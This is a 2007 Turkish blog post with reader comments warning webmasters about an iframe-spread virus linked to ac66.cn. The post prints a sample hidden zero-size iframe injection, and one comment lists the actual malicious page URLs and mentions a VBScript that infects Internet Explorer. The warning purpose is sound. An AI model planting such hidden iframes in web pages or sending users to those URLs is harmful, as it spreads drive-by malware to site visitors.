Web. 2.0 ile beraber web sitelerinin yaraticilik noktalarinda saglam gelismeler izlemek istiyorduk. Ancak yeni teknolojiler yeni tehlikeleri de gundeme getiriyor. Su siralar cok populer ve "gereginden fazla" etkili bir virus gundemde. İsmi ac66.cn Kesinlikle bu ismi arama motorlarinda aratmayin. Romali mesuliyet kabul etmez. Yalnizca suradan bilgi edinin.
Zira bu virus, iframe tagi vasitasiyla mikrobunu yaymaktadir. Ornegin;
[iframe src="http://xxxxxxx/88/index.htm" frameborder="0" height="0" width="0"][/iframe]
Bu tagleri icinde barindiran siteleri (nerden bilicez demeyin, sitenin amaci zaten bellidir cisminden) ziyaret etmeyin, yanina yaklasmayin. Bir de bu konuda kaspersky'a guvenin derim ben..
- romanistabukowski
- 3 yorum var
- 05 Ocak 2007 10:42
« önceki yazı Bilmeniz gereken temel network komutlari |
sonraki yazı » Photoshop tasarımınızı XHTML ve CSS'e çevirin |
Yorumlar
yeni teknolojiler ve web 2.0 denilen olayla ilgisini anlayamadım, lakin taaaa 2002-2003 senesinde buna benzer bir virüs bulaşmıştı, her html - ve sanırım php dosyalarına da - dosyamın sonuna belirli kod koymuştu (vbscript olma ihtimali yüksek), yayıyordu felan kendini.
tüm klasörde o kodu "" ile değiştirince kaybetmişti kendini, o yolu tavsiye edebilirim sizlere de. dosyalarınızdan virüsü kaldırır en azından.
onun dışında forumda okuduğum 1.exe, 2.exe konusunda ise size sormadan bilgisayarınıza iframe etiketiyle nasıl dosya kaydedebilir? gene iş kullanıcıda bitiyor.
| muarifer | |
|
|
(0 puan) |
|
| 05 Ocak 2007 11:18 |
bahsedilen kod standart frame şeysi ve tarayıcının bu kodu çalıştırıp enfeksiyon kapması bana biraz saçma geldi. ama belki internet explorer bunu bile çalıştıracak kadar salaktır (hayır değil).
şimdi merak ettiğim şey neden bu kelimeyi google da aratmıyoruz? arama motorları sitelerde buldukları virüsleri hemencecik bize mi yüklüyor sanki? kaldı ki verdiğin link bende açılmadı.
ayrıca web2.0 ile nasıl ilişki kuruldu? eğer diyorsan ki iframe web 2.0 nin getirdiği bir olay; kesinlikle yanılıyorsun; hatta iframe web 2.0 ile tarih olan bir olay.
edit: google da biraz aratınca olay açığa kavuştu bi miktar;
virüs bulaştığı kişi eğer webmaster ise bilgisayarındaki html sayfalarına riskli sayfayı açan bir iframe yerleştiriyor. iframe şu sayfayı açıyor(dikkat: riskli olabilir): http://www.ac66.cn/88/index.htm
arkadaş üşenmemiş bir de sayaç koymuş sayfaya.
o sayfa da iframe ile şu sayfayı açıyor (çok dikkat!): http://www.ac66.cn/88/kkpp.htm
bu sayfanın kaynak koduna baktığımızda bir vbscripti görüyoruz. muhtemelen zararlı olan kod işte bu; ie kullananlar yandı.
| mrtksn | |
|
|
(0 puan) |
|
| 05 Ocak 2007 14:24 |
Burda web 2.0la bağlantı kurulmasının sebebi şu; web 2.0 denilince yaratılıcık bekleniyor artık yaratıcılık devri oluşsun deniliyor. Ancak bu yaratıcılık devri bize web 2.0 yerine iframe viruslerı olarak gerı donuyor. Sakin olmak lazım ters yorumlar yazmadan önce :)
| b i l g e | |
|
|
(0 puan) |
|
| 08 Ocak 2007 10:35 |
pillinetwork sitelerine yorum ekleyebilmek ve daha fazlası için, üye olun ya da giriş yapın.
İlgili Yazılar
- Mynet.com hack'lendi (45)
- Web Güvenliği Günleri Katılım Çağrısı (0)
- Ruby On Rails Güvenlik Klavuzu (0)
- Online dosya şifreleme ve çözümleme (5)
- web sitesi güvenliği için (6)
- web geliştiricileri için firefox eklentileri (2)
- css ve ajax kopya kağıtları (2)
- web geliştiricileri için araçlar (1)
- Yahoo Shortcuts (0)
- Online web ve tasarım yayınları(dergiler vs) li... (7)
Bu Yazıyı Tutanlar
Beğendiğiniz bir yazıya "tuttum" demek için başlığın yanındaki yıldıza tıklayabilirsiniz.
